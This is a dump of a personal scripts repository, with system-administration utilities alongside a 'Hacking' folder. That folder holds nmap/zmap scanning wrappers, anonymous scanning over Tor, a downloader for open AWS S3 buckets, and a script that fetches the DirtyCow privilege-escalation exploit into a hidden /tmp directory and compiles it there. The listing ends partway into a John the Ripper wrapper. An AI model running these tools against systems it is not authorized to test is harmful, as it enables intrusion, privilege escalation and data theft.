├── .update_README.md.sh ├── Databases └── mysql_trace_changes_example.sql ├── Graphical_Environments ├── firefox_history_stats.sh ├── record_screen.sh └── set_gnome-shell_theme.sh ├── Hacking ├── Info_Gathering │ ├── nmap_amap_identify.sh │ ├── nmap_deep.sh │ ├── nmap_html_report.sh │ ├── nmap_light.sh │ ├── nmap_with_tor.sh │ └── zmap_screenshot.sh ├── Misc │ ├── S3obd.py │ └── dirtycow_centos.sh ├── Password_Cracking │ ├── autojohn.sh │ ├── dict_split_n_sort.sh │ ├── htmltable2csv.py │ ├── pwd_sucker_crackpot.sh │ ├── pwd_sucker_gromweb.sh │ ├── pwd_sucker_hashkiller.sh │ └── pwd_sucker_md5db.sh ├── Penetration_Testing │ ├── find_reflected_xss.sh │ ├── sniff_host_traffic.sh │ ├── sniff_passwords_tcpdump.sh │ └── sniff_ssh_credentials.sh └── snippets.txt ├── LICENSE ├── Media ├── aspectpad ├── image_orientation.sh └── snippets.txt ├── Networking ├── get_nics_with_ip_mac_status.sh ├── get_nics_with_ip_mac_status_freebsd.sh ├── list_public_open_ports.sh ├── ping_until_alive.sh ├── reverse_ip_lookup.sh ├── snippets.txt ├── ssh_proxy_pivot.sh ├── ssh_socks5_proxy_remote_host.sh └── tor_check.sh ├── README.md ├── System_Administration ├── Clusters │ └── RedHat_HA_Cluster │ │ ├── cluster_info.sh │ │ ├── cluster_logs.sh │ │ ├── cluster_rrp_tcpdump.sh │ │ ├── cluster_running_resource_groups.sh │ │ ├── cluster_status.sh │ │ └── prompt.sh ├── Virtualization │ └── proxmox_import_ova.sh ├── fix_locales.sh ├── mount_smb_shares_with_auth.sh ├── pip_upgrade_pkgs.sh ├── prepare_kali.sh ├── quick_backup.sh └── snippets.txt ├── Utilities ├── NessusToExcel.py ├── free_buffer_cache.sh ├── git_list_repos.sh ├── git_update_repos.sh ├── greenpass_qr_decoder.sh ├── magnet2torrent.sh ├── mysql2csv.sh ├── nessus_massive_export.sh ├── send_sms.sh ├── share_dir_via_rdp.sh ├── shrinkpdf.sh ├── snippets.txt └── xfce4-root-terminal.sh ├── Web ├── SharePwd.py ├── extract_links.sh └── share_file.sh └── config_files ├── .bashrc ├── .bashrc_freebsd ├── .config └── sublime-text-3 │ └── Packages │ └── User │ └── Preferences.sublime-settings ├── .gcm └── gcm.conf ├── .nanorc ├── .ssh └── config ├── .tmux.conf ├── .vimrc ├── .xinitrc └── .xprofile /.update_README.md.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | README=README.md 4 | 5 | { 6 | echo '# Scripts' 7 | echo 'A collection of personal useful scripts (in Bash and Python) for Unix and GNU/Linux systems.' 8 | echo '```' 9 | find ./ -type f \( -iname \*.sh -o -iname \*.txt -o -iname \*.py -o -iname \*.sql \) | grep -v update_README.md.sh | sort 10 | echo '```' 11 | } > $README 12 | 13 | -------------------------------------------------------------------------------- /Databases/mysql_trace_changes_example.sql: -------------------------------------------------------------------------------- 1 | /* 2 | just a stupid didactic example where INSERT/UPDATE operations on a table are 3 | logged in another table (= poor man's auditing system LOL!) 4 | */ 5 | 6 | CREATE TABLE person (name VARCHAR(20), age TINYINT(4), sex CHAR(1)); 7 | CREATE TABLE changes (date TIMESTAMP, tb VARCHAR(255), action VARCHAR(255), msg VARCHAR(255)); 8 | 9 | DELIMITER $$ 10 | CREATE PROCEDURE save_change_person(p1 VARCHAR(255), p2 TINYINT(4), p3 CHAR(1), act VARCHAR(255)) 11 | BEGIN DECLARE msg CHAR(255); 12 | SET msg = CONCAT('Changes: ', p1, ',', p2, ',', p3); 13 | INSERT INTO changes VALUES (NOW(), 'person', act, msg); 14 | END $$; 15 | 16 | CREATE TRIGGER t_save_change_person_insert AFTER INSERT ON person FOR EACH ROW CALL save_change_person(NEW.name, NEW.age, NEW.sex, 'INSERT'); 17 | CREATE TRIGGER t_save_change_person_update AFTER UPDATE ON person FOR EACH ROW CALL save_change_person(NEW.name, NEW.age, NEW.sex, 'UPDATE'); 18 | -------------------------------------------------------------------------------- /Graphical_Environments/firefox_history_stats.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: firefox_history_stats.sh 6 | # 7 | # Description: A script that gathers some statistics from your Firefox history. 8 | # It uses sqlite3 to parse user's Firefox history database and get 9 | # the last three months, then it removes all the IP addresses and 10 | # port numbers and finally sorts and counts them. 11 | # 12 | # Usage: ./firefox_history_stats.sh 13 | # 14 | # 15 | # --TODO-- 16 | # - ??? 17 | # 18 | # 19 | ################################################################################ 20 | 21 | 22 | # MAIN ------------------------------------------------------------------------- 23 | 24 | OUT=$(mktemp -d -q) 25 | 26 | cp $(find "${HOME}/.mozilla/firefox/" -name "places.sqlite" | head -n 1) "${OUT}/places.sqlite" 27 | sqlite3 "${OUT}/places.sqlite" "SELECT url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id and visit_date > strftime('%s','now','-3 month')*1000000 ORDER by visit_date;" > "${OUT}/urls-unsorted" 28 | sort -u "${OUT}/urls-unsorted" > "${OUT}/urls" 29 | awk -F'/' '{print $3}' "${OUT}/urls" | grep -v -E -e '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' -e ':.*' -e '^$' | sed -e 's/www\.//g' | sort | uniq -c | sort -n 30 | 31 | rm -rf ${OUT} 32 | 33 | -------------------------------------------------------------------------------- /Graphical_Environments/record_screen.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: record_screen.sh [-f FRAMES_PER_SECOND] [-o OUTPUT_FILE] 6 | # 7 | # Description: A script that records a screencast and saves it to a file. 8 | # Press CTRL+C to stop recording. 9 | # 10 | # Usage: ./record_screen.sh [-f FRAMES_PER_SECOND] [-o OUTPUT_FILE] 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # FUNCTIONS -------------------------------------------------------------------- 21 | 22 | command_exists() { 23 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 24 | } 25 | 26 | usage() { 27 | echo "Usage: $0 [-f FRAMES_PER_SECOND] [-o OUTPUT_FILE]" 1>&2 ; exit 1 ; 28 | } 29 | 30 | 31 | # CHECKS ----------------------------------------------------------------------- 32 | 33 | declare -a CMDS=( 34 | "ffmpeg" 35 | ); 36 | 37 | for CMD in ${CMDS[@]} ; do 38 | command_exists $CMD 39 | done 40 | 41 | while getopts ":f:o:" OPTS ; do 42 | case "${OPTS}" in 43 | f) 44 | FRAMES_PER_SECOND=${OPTARG} 45 | ;; 46 | o) 47 | OUTPUT_FILE=${OPTARG} 48 | ;; 49 | *) 50 | usage 51 | ;; 52 | esac 53 | done 54 | shift $((OPTIND-1)) 55 | 56 | if [[ -z "${FRAMES_PER_SECOND}" || -z "${OUTPUT_FILE}" ]] ; then 57 | usage 58 | fi 59 | 60 | 61 | # MAIN ------------------------------------------------------------------------- 62 | 63 | if [[ -z ${DISPLAY} ]] ; then 64 | echo "DISPLAY variable is not set. Please make sure you are running in a graphical environment." 65 | 66 | exit 1 67 | fi 68 | 69 | ffmpeg -f x11grab -s wxga -r ${FRAMES_PER_SECOND} -i ${DISPLAY} -qscale 0 ${OUTPUT_FILE} 70 | 71 | -------------------------------------------------------------------------------- /Graphical_Environments/set_gnome-shell_theme.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: set_gnome-shell_theme.sh 6 | # 7 | # Description: A script that sets a Gnome-Shell theme via command line. 8 | # 9 | # Usage: ./set_gnome-shell_theme.sh [-l | ] 10 | # 11 | # 12 | # --TODO-- 13 | # - Check themes names 14 | # - List only valid Gnome-Shell themes 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # FUNCTIONS -------------------------------------------------------------------- 22 | 23 | command_exists() { 24 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 25 | } 26 | 27 | 28 | # CHECKS ----------------------------------------------------------------------- 29 | 30 | declare -a CMDS=( 31 | "gsettings" 32 | ); 33 | 34 | for CMD in ${CMDS[@]} ; do 35 | command_exists $CMD 36 | done 37 | 38 | 39 | # MAIN ------------------------------------------------------------------------- 40 | 41 | OPTION=$1 42 | THIS=$(basename "$0") 43 | 44 | if [[ -z "$OPTION" ]] ; then 45 | echo "Usage: $THIS [-l | ]" 46 | echo 47 | echo " -l | --list - List all the available themes" 48 | echo " - Name of the theme to be set" 49 | 50 | exit 1 51 | fi 52 | 53 | if [[ "$OPTION" == "-l" || "$OPTION" == "--list" ]] ; then 54 | ls -A1 /usr/share/themes/ 55 | else 56 | echo "Setting Gnome-Shell theme \""$OPTION"\"..." 57 | 58 | gsettings set org.gnome.desktop.interface gtk-theme \""$OPTION"\" 59 | gsettings set org.gnome.desktop.wm.preferences theme \""$OPTION"\" 60 | gsettings set org.gnome.shell.extensions.user-theme name \""$OPTION"\" 61 | fi 62 | 63 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_amap_identify.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_amap_identify.sh 6 | # 7 | # Description: A script that tries to discover the real services running behind 8 | # the open ports on a target host. 9 | # 10 | # Usage: ./nmap_amap_identify.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # FUNCTIONS -------------------------------------------------------------------- 21 | 22 | command_exists() { 23 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 24 | } 25 | 26 | 27 | # CHECKS ----------------------------------------------------------------------- 28 | 29 | if [[ $EUID -ne 0 ]] ; then 30 | echo "This script must be run as root!" 1>&2 31 | 32 | exit 1 33 | fi 34 | 35 | declare -a CMDS=( 36 | "amap" 37 | "nmap" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | 45 | # MAIN ------------------------------------------------------------------------- 46 | 47 | IP=$1 48 | TMPFILE=$(mktemp -q) 49 | 50 | nmap -sS -v -O --open ${IP} -oG ${TMPFILE} &>/dev/null 51 | 52 | cat ${TMPFILE} | grep 'Ports:' | cut -d':' -f3 | sed -e 's/, /\n/g' | grep open | cut -d'/' -f1 53 | 54 | for PORT in $(cat ${TMPFILE} | grep 'Ports:' | cut -d':' -f3 | sed -e 's/, /\n/g' | grep open | cut -d'/' -f1) ; do 55 | amap -q -U ${IP} ${PORT} | grep matches 56 | done 57 | 58 | rm -f ${TMPFILE} 59 | 60 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_deep.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_deep.sh 6 | # 7 | # Description: A script that performs a deep, complete and aggressive NMAP scan. 8 | # 9 | # Usage: ./nmap_deep.sh 10 | # 11 | # 12 | # --TODO-- 13 | # - ??? 14 | # 15 | # 16 | ################################################################################ 17 | 18 | 19 | # VARIABLES -------------------------------------------------------------------- 20 | 21 | TARGET=$1 22 | 23 | 24 | # FUNCTIONS -------------------------------------------------------------------- 25 | 26 | command_exists() { 27 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 28 | } 29 | 30 | 31 | # CHECKS ----------------------------------------------------------------------- 32 | 33 | if [[ $EUID -ne 0 ]] ; then 34 | echo "This script must be run as root!" 1>&2 35 | 36 | exit 1 37 | fi 38 | 39 | declare -a CMDS=( 40 | "nmap" 41 | ); 42 | 43 | for CMD in ${CMDS[@]} ; do 44 | command_exists $CMD 45 | done 46 | 47 | 48 | # MAIN ------------------------------------------------------------------------- 49 | 50 | if [[ ! -z $TARGET ]] ; then 51 | nmap -vv -Pn -sS -A -sC -p- -T 3 -script-args=unsafe=1 -n ${TARGET} 52 | else 53 | >&2 echo "Error! not specified." 54 | echo "Usage: ./$(basename $BASH_SOURCE) " 55 | fi 56 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_html_report.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_html_report.sh 6 | # 7 | # Description: A script that runs a full and exhaustive scan against one or 8 | # more targets, and then creates a nice HTML report using a modern 9 | # XSL style. 10 | # 11 | # Usage: ./nmap_html_report.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # FUNCTIONS -------------------------------------------------------------------- 22 | 23 | command_exists() { 24 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 25 | } 26 | 27 | 28 | # CHECKS ----------------------------------------------------------------------- 29 | 30 | if [[ $EUID -ne 0 ]] ; then 31 | echo "This script must be run as root!" 1>&2 32 | 33 | exit 1 34 | fi 35 | 36 | declare -a CMDS=( 37 | "nmap" 38 | "curl" 39 | "xsltproc" 40 | ); 41 | 42 | for CMD in ${CMDS[@]} ; do 43 | command_exists $CMD 44 | done 45 | 46 | 47 | # MAIN ------------------------------------------------------------------------- 48 | 49 | TARGET=$1 50 | SCANNAME="nmap_advanced_portscan" 51 | 52 | # check if TARGET is a file (with the list of targets), or just a single host/subnet 53 | if [ -e $TARGET ]; then 54 | nmap -sS -sV --script=default,version,vuln,ssl-enum-ciphers,ssh-auth-methods,ssh2-enum-algos -Pn --open --min-hostgroup 256 --min-rate 5000 --max-retries 3 --script-timeout 300 -d -oA nmap_advanced_portscan -vvv -iL $TARGET 55 | else 56 | nmap -sS -sV --script=default,version,vuln,ssl-enum-ciphers,ssh-auth-methods,ssh2-enum-algos -Pn --open --min-hostgroup 256 --min-rate 5000 --max-retries 3 --script-timeout 300 -d -oA nmap_advanced_portscan -vvv $TARGET 57 | fi 58 | 59 | # download the XSL style 60 | curl https://raw.githubusercontent.com/Haxxnet/nmap-bootstrap-xsl/main/nmap-bootstrap.xsl -o style.xsl 61 | 62 | # apply the XSL style to the XML to obtain the final HTML report 63 | xsltproc -o $SCANNAME.html style.xsl $SCANNAME.xml 64 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_light.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_light.sh 6 | # 7 | # Description: A script that performs a light scan againt a subnet considering 8 | # the open ports only, then saves the output in a greppable text 9 | # file. 10 | # 11 | # Usage: ./nmap_light.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | SUBNET=$1 24 | 25 | 26 | # FUNCTIONS -------------------------------------------------------------------- 27 | 28 | command_exists() { 29 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | if [[ $EUID -ne 0 ]] ; then 36 | echo "This script must be run as root!" 1>&2 37 | 38 | exit 1 39 | fi 40 | 41 | declare -a CMDS=( 42 | "nmap" 43 | ); 44 | 45 | for CMD in ${CMDS[@]} ; do 46 | command_exists $CMD 47 | done 48 | 49 | 50 | # MAIN ------------------------------------------------------------------------- 51 | 52 | if [[ ! -z $SUBNET ]] ; then 53 | OUTFILE=$(echo "nmap_$SUBNET.txt" | tr '/' '_') 54 | 55 | nmap -sS -v -O --open -oG ${OUTFILE} ${SUBNET} 56 | else 57 | >&2 echo "Error! not specified." 58 | echo "Usage: ./$(basename $BASH_SOURCE) " 59 | fi 60 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/nmap_with_tor.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nmap_with_tor.sh 6 | # 7 | # Description: A script that lets users run full TCP port scans with NMap 8 | # anonymously through the TOR network. TOR and ProxyChains must be 9 | # installed and configured, and the TOR daemon must be running. 10 | # 11 | # Usage: ./nmap_with_tor.sh 12 | # ( can be an IP address or a FQDN; in the second case, 13 | # the domain name is securely resolved using tor-resolve) 14 | # 15 | # Notes: Please make sure that your TOR configuration file has the 16 | # following lines: 17 | # 18 | # SOCKSPort 9050 19 | # AutomapHostsOnResolve 1 20 | # DNSPort 53530 21 | # TransPort 9040 22 | # 23 | # and that your ProxyChains configuration file has the following 24 | # lines: 25 | # 26 | # dynamic_chain 27 | # proxy_dns 28 | # tcp_read_time_out 15000 29 | # tcp_connect_time_out 8000 30 | # [ProxyList] 31 | # socks5 127.0.0.1 9050 32 | # 33 | # 34 | # --TODO-- 35 | # - ??? 36 | # 37 | # 38 | ################################################################################ 39 | 40 | 41 | # FUNCTIONS -------------------------------------------------------------------- 42 | 43 | command_exists() { 44 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 45 | } 46 | 47 | valid_ip() 48 | { 49 | local ip=$1 50 | local stat=1 51 | 52 | if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] ; then 53 | OIFS=$IFS 54 | IFS='.' 55 | ip=($ip) 56 | IFS=$OIFS 57 | [[ ${ip[0]} -le 255 && ${ip[1]} -le 255 && ${ip[2]} -le 255 && ${ip[3]} -le 255 ]] 58 | stat=$? 59 | fi 60 | 61 | return $stat 62 | } 63 | 64 | 65 | # CHECKS ----------------------------------------------------------------------- 66 | 67 | declare -a CMDS=( 68 | "nmap" 69 | "proxychains" 70 | "tor" 71 | "tor-resolve" 72 | ); 73 | 74 | for CMD in ${CMDS[@]} ; do 75 | command_exists $CMD 76 | done 77 | 78 | 79 | # MAIN ------------------------------------------------------------------------- 80 | 81 | TARGET=$1 82 | SOCKSPORT=9050 83 | OUT="/tmp/${TARGET}.out" 84 | 85 | if [[ ! -z ${TARGET} ]] ; then 86 | 87 | if valid_ip ${TARGET} ; then 88 | : 89 | else 90 | TARGET=$(tor-resolve ${TARGET} 127.0.0.1:${SOCKSPORT}) 91 | fi 92 | 93 | #proxychains nmap -4 -sT -Pn -n -vv --open -oG ${OUT} ${TARGET} 94 | proxychains nmap -4 -F -sT -Pn -n -v --open -oG ${OUT} ${TARGET} 95 | else 96 | >&2 echo "Error! not specified." 97 | echo "Usage: ./$(basename $BASH_SOURCE) " 98 | fi 99 | -------------------------------------------------------------------------------- /Hacking/Info_Gathering/zmap_screenshot.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: zmap_screenshot.sh 6 | # 7 | # Description: A script that takes screenshots of all the websites belonging to 8 | # a whole subnet. 9 | # 10 | # Usage: ./zmap_screenshot.sh [] 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # FUNCTIONS -------------------------------------------------------------------- 21 | 22 | command_exists() { 23 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 24 | } 25 | 26 | 27 | # CHECKS ----------------------------------------------------------------------- 28 | 29 | declare -a CMDS=( 30 | "amap" 31 | "cutycapt" 32 | "host" 33 | "ipcalc" 34 | "whois" 35 | "zmap" 36 | ); 37 | 38 | for CMD in ${CMDS[@]} ; do 39 | command_exists $CMD 40 | done 41 | 42 | 43 | # MAIN ------------------------------------------------------------------------- 44 | 45 | TARGET=$1 46 | PORT=$2 47 | THIS=$(basename "$0") 48 | 49 | if [[ -z "$TARGET" ]] ; then 50 | # echo "Usage: $THIS [] []" 51 | echo "Usage: $THIS []" 52 | echo 53 | echo " - Initial host (eg: scanme.nmap.org)" 54 | echo " - Port to check (default: 80)" 55 | # echo " - Directory where screnshot are saved (default: /tmp/shots)" 56 | 57 | exit 1 58 | fi 59 | 60 | echo "Initial target: $TARGET" 61 | 62 | if [[ -z "$PORT" ]] ; then 63 | PORT=80 64 | 65 | echo "Port: $PORT (default)" 66 | else 67 | echo "Port: $PORT" 68 | fi 69 | 70 | IP=$(host $TARGET | grep 'has address' | grep -v 'IPv6' | grep -v 'NXDOMAIN' | awk '{print $NF}' | head -1) 71 | 72 | if [[ -z "$IP" ]] ; then 73 | echo "Wrong target format or target not resolvable." 74 | 75 | exit 1 76 | fi 77 | 78 | OUT_DIR="/tmp/shots_${TARGET}" 79 | mkdir $OUT_DIR 80 | 81 | echo "Target's IP address: $IP" 82 | 83 | RANGE=$(whois $IP | egrep 'inetnum:|NetRange:' | head -1 | cut -d':' -f2 | xargs | tr -d ' ') 84 | 85 | echo "IP addresses range: $RANGE" 86 | 87 | #NETWORK=$(ipcalc "$RANGE" | tail -1) 88 | NETWORK=$(ipcalc "$RANGE" | grep -v deaggregate | head -1) 89 | 90 | echo "Range network: $NETWORK" 91 | 92 | FILENAME="${TARGET}_$(echo "$NETWORK" | sed -e 's/\//_/g').txt" 93 | 94 | sudo zmap -p $PORT -o $FILENAME -q --disable-syslog "${NETWORK}" 95 | 96 | echo "Discovered IPs file: $FILENAME" 97 | echo "Discovered hosts: $(cat $FILENAME | wc -l)" 98 | 99 | for IP in $(cat $FILENAME) ; do 100 | TEST_HTTPS=$(amap -1 -q $IP $PORT | grep 'matches ssl') 101 | TEST_HTTPS=$? 102 | TEST_HTTP=$(amap -1 -q $IP $PORT | grep 'matches http') 103 | TEST_HTTP=$? 104 | 105 | if [[ $TEST_HTTPS -eq 0 && $TEST_HTTP -ne 0 ]] ; then # HTTPS 106 | PROTOCOL="https" 107 | elif [[ $TEST_HTTP -eq 0 && $TEST_HTTPS -ne 0 ]] ; then # HTTP 108 | PROTOCOL="http" 109 | elif [[ $TEST_HTTP -eq 0 && $TEST_HTTPS -eq 0 ]] ; then # probably HTTPS 110 | PROTOCOL="https" 111 | else 112 | echo "Skipping host $IP (unknown protocol for port $PORT)" 113 | 114 | continue 115 | fi 116 | 117 | echo "Saving screenshot for site: $PROTOCOL://$IP:$PORT" 118 | 119 | cutycapt --insecure --out=$OUT_DIR/$IP.jpg --smooth --private-browsing=on --max-wait=5000 --url="$PROTOCOL://$IP:$PORT" 2> /dev/null 120 | done 121 | -------------------------------------------------------------------------------- /Hacking/Misc/S3obd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # S3obd.py 4 | # ----------- 5 | # A simple Python script that can download files from an open AWS S3 bucket. 6 | # 7 | # Coded by: Riccardo Mollo (riccardomollo84@gmail.com) 8 | # 9 | 10 | import argparse 11 | import os 12 | import requests 13 | import xml.etree.ElementTree as ET 14 | 15 | 16 | def check_directory(directory_path): 17 | if not os.path.exists(directory_path): 18 | try: 19 | os.makedirs(directory_path) 20 | print(f"Directory '{directory_path}' created successfully.") 21 | except OSError as e: 22 | print(f"Error: Unable to create directory '{directory_path}': {e}") 23 | return False 24 | 25 | if os.access(directory_path, os.W_OK) and os.access(directory_path, os.R_OK): 26 | print(f"Directory '{directory_path}' is writable and readable.") 27 | return True 28 | else: 29 | print(f"Error: Directory '{directory_path}' is not writable or readable.") 30 | return False 31 | 32 | 33 | def download_file(url, folder_path, file_name): 34 | file_path = os.path.join(folder_path, file_name) 35 | 36 | response = requests.get(url) 37 | 38 | if response.status_code == 200: 39 | with open(file_path, "wb") as file: 40 | file.write(response.content) 41 | print(f"File downloaded and saved at: {file_path}") 42 | else: 43 | print( 44 | f"Error: Unable to download file from {url}. Status code: {response.status_code}" 45 | ) 46 | 47 | 48 | parser = argparse.ArgumentParser(prog="S3obd.py") 49 | parser.add_argument("-u", "--url", help="URL of the open AWS S3 bucket", required=True) 50 | parser.add_argument( 51 | "-d", "--directory", help="output directory to save files into", required=True 52 | ) 53 | args = parser.parse_args() 54 | url = args.url 55 | directory = args.directory 56 | 57 | if not check_directory(directory): 58 | exit(0) 59 | 60 | if not url.endswith("/"): 61 | url += "/" 62 | 63 | response = requests.get(url) 64 | 65 | if response.status_code == 200: 66 | xml_content = response.text 67 | 68 | root = ET.fromstring(xml_content) 69 | namespace = {"ns": "http://s3.amazonaws.com/doc/2006-03-01/"} 70 | 71 | keys = [ 72 | content.find("ns:Key", namespace).text 73 | for content in root.findall(".//ns:Contents", namespace) 74 | ] 75 | 76 | for key in keys: 77 | download_file(url + key, directory, key) 78 | else: 79 | print( 80 | f"Error: Unable to fetch content from {url}. Status code: {response.status_code}" 81 | ) 82 | -------------------------------------------------------------------------------- /Hacking/Misc/dirtycow_centos.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # this script is useful to compile the FireFart DirtyCow exploit on a CentOS 7.X machine which doesn't have a C compiler 4 | 5 | DIR=/tmp/.exploits 6 | 7 | mkdir -p ${DIR} 8 | cd ${DIR} 9 | 10 | # download FireFart DirtyCow exploit's C source code 11 | wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c 12 | 13 | # download RPMs for CentoOS 7.X with all the necessary tools to compile the exploit 14 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/compat-gcc-44-4.4.7-8.el7.x86_64.rpm 15 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/cpp-4.8.5-44.el7.x86_64.rpm 16 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/gcc-4.8.5-44.el7.x86_64.rpm 17 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-2.17-317.el7.x86_64.rpm 18 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-common-2.17-317.el7.x86_64.rpm 19 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-devel-2.17-317.el7.x86_64.rpm 20 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-headers-2.17-317.el7.x86_64.rpm 21 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-static-2.17-317.el7.x86_64.rpm 22 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/glibc-utils-2.17-317.el7.x86_64.rpm 23 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/libmpc-1.0.1-3.el7.x86_64.rpm 24 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/libmpc-devel-1.0.1-3.el7.x86_64.rpm 25 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/mpfr-3.1.1-4.el7.x86_64.rpm 26 | wget http://mirror.centos.org/centos/7/os/x86_64/Packages/mpfr-devel-3.1.1-4.el7.x86_64.rpm 27 | 28 | # explode the RPMs 29 | for pkg in *.rpm ; do 30 | rpm2cpio $pkg | cpio -idmv 31 | done 32 | 33 | # update the environment variables 34 | export PATH=${DIR}/sbin:${DIR}/usr/bin:${DIR}/usr/sbin:$PATH 35 | export LD_LIBRARY_PATH=${DIR}/usr/lib64:${DIR}/lib64:$LD_LIBRARY_PATH 36 | export LIBRARY_PATH=${DIR}/usr/lib64:${DIR}/lib64:$LD_LIBRARY_PATH 37 | export CPATH=${DIR}/usr/include 38 | 39 | ldconfig -v -f ${DIR}/etc/ld.so.conf -C ${DIR}/etc/ld.so.cache 40 | 41 | gcc -I ${DIR}/usr/include -pthread dirty.c -o dirty -lcrypt 42 | -------------------------------------------------------------------------------- /Hacking/Password_Cracking/autojohn.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: autojohn.sh 6 | # 7 | # Description: A script that is meant to simplify and automate the usage of the 8 | # powerful JohnTheRipper password cracking tool. 9 | # At the moment, it is solely intended for dictionary attacks. 10 | # 11 | # Usage: ./autojohn.sh --help|-h 12 | # ./autojohn.sh 13 | # ./autojohn.sh [] 14 | # ./autojohn.sh --info 15 | # ./autojohn.sh --sessions 16 | # ./autojohn.sh --show 17 | # ./autojohn.sh --rules 18 | # ./autojohn.sh --polish 19 | # ./autojohn.sh --clean 20 | # 21 | # 22 | # --TODO-- 23 | # - improve and optimize code 24 | # - implement simple bruteforce: 25 | # john test.txt --format=Raw-MD5 -1=?l -mask=?1?1?1?1?1?1?1 --fork=4 26 | # ./autojohn.sh --bruteforce --min --max 8 --mask 27 | # 28 | # 29 | ################################################################################ 30 | 31 | 32 | # VARIABLES -------------------------------------------------------------------- 33 | 34 | DICT_DIR=~/DICTIONARIES # each dictionary/wordlist in this directory *MUST* be a plain text ".txt" file 35 | POTS_DIR=~/.autojohn # here you will find the cracked passwords from each session 36 | 37 | 38 | # OTHER VARIABLES (don't touch them!) ------------------------------------------ 39 | 40 | OS=$(uname -s) 41 | 42 | if [[ $OS == "Linux" ]] ; then 43 | DU_A_PARAM='--apparent-size' 44 | CORES=$(grep -c ^processor /proc/cpuinfo) 45 | elif [[ $OS == "FreeBSD" ]] ; then 46 | DU_A_PARAM='-A' 47 | CORES=$(sysctl -n hw.ncpu) 48 | else 49 | DU_A_PARAM='' 50 | CORES=1 51 | fi 52 | 53 | 54 | # FUNCTIONS -------------------------------------------------------------------- 55 | 56 | command_exists() { 57 | command -v "$1" > /dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 58 | } 59 | 60 | logo() 